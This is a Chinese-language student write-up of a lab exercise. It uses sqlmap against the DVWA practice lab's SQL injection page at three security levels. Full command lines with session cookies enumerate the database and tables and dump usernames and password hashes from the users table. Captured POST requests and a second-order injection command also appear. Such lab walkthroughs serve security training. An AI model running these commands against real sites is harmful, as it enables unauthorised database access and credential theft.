本文作者:啊昊(WEB安全攻防星球学员)
LOW等级
查看地址:
http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#
查看cookie:
cookie:security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5
通过网址我们可以发现,提交方式是用Get方式的!开启sqlmap对改网址进行扫描:
C:Python27sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5"
C:Python27sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --current-db
C:Python27sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --tables -D"dvwa"
C:Python27sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low;PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --columns -D"dvwa" -T"users"
查询表中user,和passsword的信息:
C:Python27sqlmap>sqlmap.py -u "http://www.d.com/DVWA1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low;PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --dump -D"dvwa" -T"users" -C"user,password"得到结果,并计算出hash值:
网址:
http://www.d.com/DVWA-1.9/vulnerabilities/sqli/#
cookie值:
security=medium; PHPSESSID=ssgdhr8nr2s5locu7amule13q5
POST /DVWA-1.9/vulnerabilities/sqli/ HTTP/1.1Host: www.d.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.d.com/DVWA-1.9/vulnerabilities/sqli/Cookie: security=medium; PHPSESSID=ssgdhr8nr2s5locu7amule13q5DNT: 1X-Forwarded-For: 8.8.8.8Connection: keep-aliveUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 18id=1&Submit=Submit
发现提交网址为:/DVWA-1.9/vulnerabilities/sqli/,提交的数据包为id=1&Submit=Submit。
因此在sqlmap用如下指令进行测试:
sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/" --cookie "security=medium;PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --data "id=1&Submit=Submit"期待的结果到来了:
POST /DVWA-1.9/vulnerabilities/sqli/session-input.php HTTP/1.1Host: www.d.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.d.com/DVWA-1.9/vulnerabilities/sqli/session-input.phpCookie: security=high; PHPSESSID=ssgdhr8nr2s5locu7amule13q5DNT: 1X-Forwarded-For: 8.8.8.8Connection: keep-aliveUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 18id=1&Submit=Submit
可以看到,这是从/session-input.php来的要去到我们之前的页面
/DVWA-1.9/vulnerabilities/sqli/
OK,可以尝试一下了。
sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/session-input.php” --data "id=1&Submit=Submit" -p "id" --cookie "security=high;PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --second-order "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/"
扫描下方二维码加入Web安全星球学习
加入后会邀请你进入内部微信群,内部微信群永久有效!
本文始发于微信公众号(Ms08067安全实验室):【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论